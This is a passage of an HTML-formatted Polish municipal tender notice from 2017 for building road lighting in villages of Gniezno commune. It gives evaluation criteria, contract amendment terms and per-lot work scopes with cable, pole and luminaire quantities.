              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Okres gwarancji i rękojmi </td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1.	Strony mają prawo do przedłużenia Terminu zakończenia o okres trwania przyczyn, z powodu których będzie zagrożone dotrzymanie Terminu zakończenia robót, w następujących sytuacjach : 

a)	jeżeli przyczyny, z powodu których będzie zagrożone dotrzymanie Terminu zakończenia robót będą następstwem okoliczności, za które odpowiedzialność ponosi Zamawiający, w szczególności będą następstwem nieterminowego przekazania Terenu budowy, konieczności zmian Dokumentacji projektowej w zakresie, w jakim ww. okoliczności miały lub będą mogły mieć wpływ ba dotrzymanie Terminu zakończenia robót, 
b)	gdy wystąpią niekorzystne warunki atmosferyczne uniemożliwiające  prawidłowe wykonanie robót,             w szczególności z powodu technologii realizacji prac określonej: Umową, normami lub innymi przepisami, wymagające konkretnych warunków atmosferycznych, jeżeli konieczność wykonania prac w tym okresie nie jest następstwem okoliczności, za które Wykonawca ponosi odpowiedzialność, 
c)	gdy wystąpi koniczność wykonania robót lub innych robót niezbędnych do wykonania przedmiotu Umowy ze względu na zasady wiedzy technicznej, oraz udzielania zamówień dodatkowych, które wstrzymują lub opóźniają realizację przedmiotu Umowy, wystąpienia niebezpieczeństwa kolizji                 z planowanymi lub równolegle prowadzonym przez inne podmioty inwestycjami w zakresie niezbędnym do uniknięcia lub usunięcia tych kolizji, 
d)	wystąpią opóźnienia w dokonaniu określonych czynności lub ich zaniechanie przez właściwe organy administracji państwowej, które nie są następstwem okoliczności, za które Wykonawca ponosi odpowiedzialność, 
e)	jeżeli wystąpi brak możliwości wykonania robót z powodu nie dopuszczenia do ich wykonania przez uprawniony organ lub nakazania ich wstrzymania przez uprawniony organ, z przyczyn niezależnych od Wykonawcy,
f)	wystąpienia Siły wyższej uniemożliwiającej wykonanie przedmiotu Umowy zgodnie z jej postanowieniami. 
2.	Wykonawca zobowiązany jest do przekazania Zamawiającemu wniosku dotyczącego zmiany Umowy wraz z opisem zdarzenia lub okoliczności stanowiących podstawę do żądania takiej zmiany. 
3.	W terminie 7 dni roboczych od dnia otrzymania żądania zmiany, Zamawiający powiadomi Wykonawcę o akceptacji żądania zmiany Umowy i terminie podpisania aneksu do Umowy lub odpowiednio o braku akceptacji zmian. 
4.	Wszelkie zmiany Umowy są dokonywane przez umocowanych przedstawicieli Zamawiającego              i Wykonawcy w formie pisemnej w drodze aneksu Umowy, pod rygorem nieważności. 
5.	W razie wątpliwości, przyjmuje się, że nie stanowią zmiany Umowy następujące zmiany: 
a)	dane związane z obsługą administracyjną  organizacyjną umowy, 
b)	dane adresowe, 
c)	dane rejestrowe, 
d)	będące następstwem sukcesji uniwersalnej po jednej ze stron Umowy. 
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 09/05/2017, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Budowa oświetlenia drogoweg Dalki os. Wichrowe <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	Przedmiot inwestycji.

Przedmiotem niniejszej inwestycji jest budowa  oświetlenia terenu ulicznego w miejscowości Dalki os.Wichrowe dz. nr 42/4, 42/13, 42/21, gmina Gniezno.
Zakres prac przy budowie sieci wodociągowej : 
Ustalenia zawarte w niniejszej specyfikacji dotyczą zasad prowadzenia robót związanych z dobudową oświetlenia ulicznego w miejscowości Dalki os. Wichrowe dz. nr 42/4, 42/13,42/21, gmina Gniezno. Specyfikację należy rozpatrywać łącznie z przedmiarem robót, projektem budowlanym i wydanymi pozwoleniami i uzgodnieniami
Projektuje się:
- wykopu 585 m
- budowę linii kablowej oświetleniowej kablem typu YAKY 4x 35 mm2 o długości całkowitej 12 m
- budowę linii kablowej oświetleniowej kablem typu YAKY 4x 25 mm2 o długości całkowitej 649 m
- budowę szafki oświetleniowej SO
- budowę 11 słupów oświetleniowych ośmiokątnych typu BETA 6/1/1,5
- budowę 11 tabliczek bezpiecznikowych TB1
- budowę 11 opraw oświetleniowych SGS 203 ze źródłem światła SON T Plus 70W
- budowę 585 m uziomu z bednarki FeZn 25x4 mm
- budowę 12 kpl. uziomów GALMAR 4,5 m
- ułożenie rury ochronnej 74 m AROT DVK 75
- wykonanie pomiarów elektrycznych
W zakresie prac tymczasowych i towarzyszących niezbędnych do wykonania robót podstawowych wchodzą:
-geodezyjne wytyczenie trasy sieci kablowej i posadowienia słupów
-inwentaryzacja powykonawczą 
-przywrócenie terenu do stanu pierwotnego po zakończeniu robót związanych z budową oświetlenia
-odtworzenie nawierzchni dróg i dojść
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45316110-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/09/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena </td><td>60</td></tr><tr><td>Okres gwarancji i rękojmi </td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Budowa oświetlenia drogowego w m. Ganina dz. 52 i trzyżewo Kościelne dz. 2 i 53<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	Przedmiot inwestycji. 
    Przedmiotem niniejszej inwestycji jest budowa oświetlenia drogowego  w miejscowości Ganina dz. nr 52                   i Strzyżewo Kościelne dz. nr 2, 53, gmina Gniezno.

Zakres prac przy budowie oświetlenia drogowego  : 
Ustalenia zawarte w niniejszej specyfikacji dotyczą zasad prowadzenia robót związanych z dobudową oświetlenia ulicznego w miejscowości Ganina dz. nr 52 i Szczytniki Kościelne dz. nr 2, 53, gmina Gniezno. Specyfikację należy rozpatrywać łącznie z przedmiarem robót, projektem budowlanym                           i wydanymi pozwoleniami i uzgodnieniami
Projektuje się:
- wykopu 442 m
- budowę linii kablowej oświetleniowej kablem typu YAKY 4x 25 mm2 o długości całkowitej 478 m
- budowę 6 słupów oświetleniowych ośmiokątnych typu BETA 7/1/1
- budowę 6 tabliczek bezpiecznikowych TB1
- budowę 6 opraw oświetleniowych SGS 203 ze źródłem światła SON T Plus 100W
- budowę 442 m uziomu z bednarki FeZn 25x4 mm
- budowę 6 kpl. uziomów GALMAR 4,5 m
- ułożenie rury ochronnej AROT DVK 75 o całkowitej długości 100 m
- przecisk AROT SRS 75 o długości 10 m
- wykonanie pomiarów elektrycznych

W zakresie prac tymczasowych i towarzyszących niezbędnych do wykonania robót podstawowych wchodzą:
-geodezyjne wytyczenie trasy sieci kablowej i posadowienia słupów
-inwentaryzacja powykonawcza
-przywrócenie terenu do stanu pierwotnego po zakończeniu robót związanych z budową oświetlenia
-odtworzenie nawierzchni dróg i dojść
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45316110-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/09/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Okres gwarancji i rękojm </td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Budowa oświelenia drogowego w m. Ganina dz. 45<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>    Przedmiotem niniejszej inwestycji jest budowa oświetlenia drogowego  w miejscowości Ganina dz. nr 45 gmina Gniezno.
Zakres prac przy budowie oświetlenia drogowego : 
Ustalenia zawarte w niniejszej specyfikacji dotyczą zasad prowadzenia robót związanych z dobudowa oświetlenia ulicznego w miejscowości Ganina dz. nr 45 gmina Gniezno. Specyfikacje należy rozpatrywać łącznie z przedmiarem robót, projektem budowlanym i wydanymi pozwoleniami i uzgodnieniami
Projektuje się:
- wykopu 405 m
- budowę linii kablowej oświetleniowej kablem typu YAKY 4x 25 mm2 o długości całkowitej 439 m
- budowę linii kablowej oświetleniowej kablem typu YAKY 4x 35 mm2 o długości całkowitej15 m
- budowę 6 slupów oświetleniowych ośmiokątnych typu BETA 7/1/1
- budowę 6 tabliczki bezpiecznikowej TB1
- budowę 6 opraw oświetleniowych SGS 203 ze źródłem światła SON T Plus 150W
- budowę 405 m uziomu z bednarki FeZn 25x4 mm
- budowę 7 kpl. uziomów GALMAR 4,5 m
- montaż 1 kpl. szafki oświetleniowej SO
- ułożenie rury ochronnej 39 m AROT DVK 75
- przycisk 22 m AROT SRS 75
- montaż osłony rurowej 3 m AROT BE 50
- wykonanie pomiarów elektrycznych
- prace geodezyjne
W zakresie prac tymczasowych i towarzyszących niezbędnych do wykonania robót podstawowych wchodzą:
-geodezyjne wytyczenie trasy sieci kablowej i posadowienia slupów
-inwentaryzacja powykonawcza
-przywrócenie terenu do stanu pierwotnego po zakończeniu robót związanych z budowa oświetlenia
-odtworzenie nawierzchni dróg i dojść
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45316110-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/09/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Okres gwarancji i rękojmi </td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>Budowa oświetlenia drogowego w m. Goślinowo dz. 390 i 391<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>    Przedmiotem niniejszej inwestycji jest budowa oświetlenia drogowego  w miejscowości Goślinowo                dz. nr 390 i 391  gmina Gniezno.
Zakres prac przy budowie oświetlenia drogowego  : 
Ustalenia zawarte w niniejszej specyfikacji dotyczą zasad prowadzenia robót związanych z dobudowa oświetlenia ulicznego w miejscowości Goślinowo dz. nr 390 i 391 gmina Gniezno. Specyfikacje należy rozpatrywać łącznie z przedmiarem robót, projektem budowlanym i wydanymi pozwoleniami i uzgodnieniami
Projektuje się:
- wykopu 365 m
- budowę linii kablowej oświetleniowej kablem typu YAKY 4x 25 mm2 o długości całkowitej 396 m
- budowę 4 slupów oświetleniowych ośmiokątnych typu BETA 6/1/1
- budowę 4 tabliczek bezpiecznikowych TB1
- budowę 2 opraw oświetleniowymi SGS 203 i źródłami światła SON T Plus 100W
- budowę 2 opraw oświetleniowymi SGS 203 i źródłami światła SON T Plus 70W
- budowę 365 m uziomu z bednarki FeZn 25x4 mm
- budowę 4 kpl. uziomów GALMAR 1,5 m
- wykonanie przycisku 36 m AROT SRS 75
- ułożenie rury ochronnej 6 m AROT DVK 75
- wykonanie pomiarów elektrycznych
W zakresie prac tymczasowych i towarzyszących niezbędnych do wykonania robót podstawowych wchodzą:
-geodezyjne wytyczenie trasy sieci kablowej i posadowienia slupów
-inwentaryzacja powykonawcza
-przywrócenie terenu do stanu pierwotnego po zakończeniu robót związanych z budowa
oświetlenia
-odtworzenie nawierzchni dróg i dojść
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45316110-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/09/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Okres gwarancji i rekojmi </td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>5
                  
                <b>Nazwa: </b>Budowa oświetlenia drogowego w m. Jankowo Dolne dz. 462, 490 i 414 <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>    Przedmiotem niniejszej inwestycji jest budowa oświetlenia drogowego  w miejscowości Jankowo Dolne          dz. nr 462, 490 , 447 i 414   gmina Gniezno.
Zakres prac przy budowie oświetlenia drogowego : 
     Ustalenia zawarte w niniejszej specyfikacji dotyczą zasad prowadzenia robót związanych z dobudową oświetlenia ulicznego w miejscowości Jankowo Dolne dz. nr 462  gmina Gniezno.  Specyfikację należy rozpatrywać łącznie z przedmiarem robót, projektem budowlanym i wydanymi pozwoleniami                         i uzgodnieniami 
Projektuje się: 
- wykopu 320 m 
- budowę linii kablowej oświetleniowej kablem typu YAKY 4x 25 mm2 o długości całkowitej  362 m 
- budowę 7 słupów oświetleniowych ośmiokątnych typu BETA 6/1/1,5 
- budowę 7 tabliczek bezpiecznikowych TB1 
- budowę 7 opraw oświetleniowych SGS 203 ze źródłem światła SON T Plus 70W 
- budowę 320 m uziomu z bednarki FeZn 25x4 mm 
- budowę 7 kpl. uziomów GALMAR 4,5 m 
- ułożenie rury ochronnej 52 m AROT DVK 75 
- wykonanie pomiarów elektrycznych
W zakresie prac tymczasowych i towarzyszących niezbędnych do wykonania robót podstawowych wchodzą: 
-geodezyjne wytyczenie trasy sieci kablowej i posadowienia słupów 
-inwentaryzacja powykonawcza 
-przywrócenie terenu do stanu pierwotnego po zakończeniu robót związanych z budową oświetlenia 
-odtworzenie nawierzchni dróg i dojść



Zakres prac przy budowie oświetlenia drogowego : 
Ustalenia zawarte w niniejszej specyfikacji dotyczą zasad prowadzenia robót związanych z dobudową oświetlenia ulicznego w miejscowości Jankówko dz. nr 490, gmina Gniezno. Specyfikację należy rozpatrywać łącznie z przedmiarem robót, projektem budowlanym i wydanymi pozwoleniami i uzgodnieniami
Projektuje się:
- wykopu 47 m
- budowę linii kablowej oświetleniowej kablem typu YAKY 4x 25 mm2 o długości całkowitej 46 m
- montaż 1 mufy przelotowej ZRM-1
- budowę 3 słupów oświetleniowych ośmiokątnych typu BETA 6/1/1
- budowę 3 tabliczek bezpiecznikowych TB1
- montaż 3 opraw oświetleniowych SGS 203 ze źródłem światła SON T Plus 70W
- budowę 47 m uziomu z bednarki FeZn 25x4 mm
- budowę 3 kpl. uziomów GALMAR 4,5 m
- demontaż 2 słupów oświetleniowych SGS 203
- wykonanie pomiarów elektrycznych

Zakres prac przy budowie oświetlenia drogowego : 
      Ustalenia zawarte w niniejszej specyfikacji dotyczą zasad prowadzenia robót związanych z dobudową oświetlenia ulicznego w miejscowości Jankowo Dolne dz. nr 447, 414, gmina Gniezno. Specyfikację należy rozpatrywać łącznie z przedmiarem robót, projektem budowlanym i wydanymi pozwoleniami i uzgodnieniami
Projektuje się:
- wykopu 262 m
- budowę linii kablowej oświetleniowej kablem typu YAKY 4x 25 mm2 o długości całkowitej 304 m
- budowę 7 słupów oświetleniowych ośmiokątnych typu BETA 6/1/1,5
- budowę 7 tabliczek bezpiecznikowych TB1
- budowę 7 opraw oświetleniowych SGS 203 ze źródłem światła SON T Plus 70W
- budowę 262 m uziomu z bednarki FeZn 25x4 mm
- budowę 7 kpl. uziomów GALMAR 4,5 m
- ułożenie rury ochronnej 49 m AROT DVK 75
        - wykonanie pomiarów elektrycznych
W zakresie prac tymczasowych i towarzyszących niezbędnych do wykonania robót podstawowych wchodzą:
-geodezyjne wytyczenie trasy sieci kablowej i posadowienia słupów
-inwentaryzacja powykonawcza
-przywrócenie terenu do stanu pierwotnego po zakończeniu robót związanych z budową
oświetlenia
-odtworzenie nawierzchni dróg i dojść
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45316110-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/09/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Okres gwarancjii rękojmi </td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>7
                  
                <b>Nazwa: </b>Budowa oświetlenia drogowego w m. Lbochnia dz. 3/14, 3/24, 2, 3/43, 3/77, 3/78, 4<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>    Przedmiotem niniejszej inwestycji jest budowa oświetlenia drogowego  w miejscowości Lubochnia                 dz. 3/14, 3/24, 2, 3/43, 3/77, 3/78, 4   gmina Gniezno.

Zakres prac przy budowie oświetlenia drogowego : 
      Ustalenia zawarte w niniejszej specyfikacji dotyczą zasad prowadzenia robót związanych z dobudową oświetlenia ulicznego w miejscowości Lubochnia dz. nr 2, 4, 3/14, 3/24, 3/43,3/77, 3/78, gmina Gniezno.
Specyfikację należy rozpatrywać łącznie z przedmiarem robót, projektem budowlanym i wydanymi pozwoleniami i uzgodnieniami
Projektuje się:
- wykopu 631 m
- budowę linii kablowej oświetleniowej kablem typu YAKY 4x 25 mm2 o długości całkowitej 697 m
- budowę 11 słupów oświetleniowych ośmiokątnych typu BETA 6/1/1
- budowę 11 tabliczek bezpiecznikowych TB1
- budowę 11 opraw oświetleniowych SGS 203 ze źródłem światła SON T Plus 70W
- budowę 631 m uziomu z bednarki FeZn 25x4 mm
- budowę 11 kpl. uziomów GALMAR 4,5 m
- ułożenie rury ochronnej 70 m AROT DVK 75
- ułożenie rury ochronnej 16 m AROT DVK 110
- wykonanie pomiarów elektrycznych
W zakresie prac tymczasowych i towarzyszących niezbędnych do wykonania robót podstawowych wchodzą:
-geodezyjne wytyczenie trasy sieci kablowej i posadowienia słupów
-inwentaryzacja powykonawcza
-przywrócenie terenu do stanu pierwotnego po zakończeniu robót związanych z budową oświetlenia
-odtworzenie nawierzchni dróg i dojść
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45316110-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/09/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Okres gwarancji i rękojmi </td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>8
                  
                <b>Nazwa: </b>Budoa oświetlenia dowego w m. Mnichowo dz. 5/2, 4/11, 10/3<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>    Przedmiotem niniejszej inwestycji jest budowa oświetlenia drogowego  w miejscowości Mnichowo                 dz. 5/2, 4/11, 10/3   gmina Gniezno.
Zakres prac przy budowie oświetlenia drogowego : 
   Ustalenia zawarte w niniejszej specyfikacji dotyczą zasad prowadzenia robót związanych z dobudową oświetlenia ulicznego w miejscowości Mnichowo dz. nr 5/2, 4/11, 10/3, gmina Gniezno. Specyfikację należy rozpatrywać łącznie z przedmiarem robót, projektem budowlanym i wydanymi pozwoleniami i uzgodnieniami
Projektuje się:
- wykopu 916 m
- budowę linii kablowej oświetleniowej kablem typu YAKY 4x 25 mm2 o długości całkowitej 1072 m
- budowę linii kablowej oświetleniowej kablem typu YAKY 4x 35 mm2 o długości całkowitej 5 m
- budowę 15 słupów oświetleniowych ośmiokątnych typu BETA 6/1/1,5
- budowę 5 słupów oświetleniowych ośmiokątnych typu BETA 7/1/1,5
- budowę 20 tabliczek bezpiecznikowych TB1
- budowę 20 opraw oświetleniowych SGS 203 i źródłem światła SON T Plus 70W
- budowę 916 m uziomu z bednarki FeZn 25x4 mm
- budowę 21 kpl. uziomów GALMAR 4,5 m
- montaż 1 kpl. szafki oświetleniowej SO
- ułożenie rury ochronnej 8 m AROT SRS 75
- ułożenie rury ochronnej 76 m AROT DVK 75
- wykonanie pomiarów elektrycznych
W zakresie prac tymczasowych i towarzyszących niezbędnych do wykonania robót podstawowych wchodzą:
-geodezyjne wytyczenie trasy sieci kablowej i posadowienia słupów
-inwentaryzacja powykonawcza
-przywrócenie terenu do stanu pierwotnego po zakończeniu robót związanych z budową oświetlenia
-odtworzenie nawierzchni dróg i dojść
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45316110-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
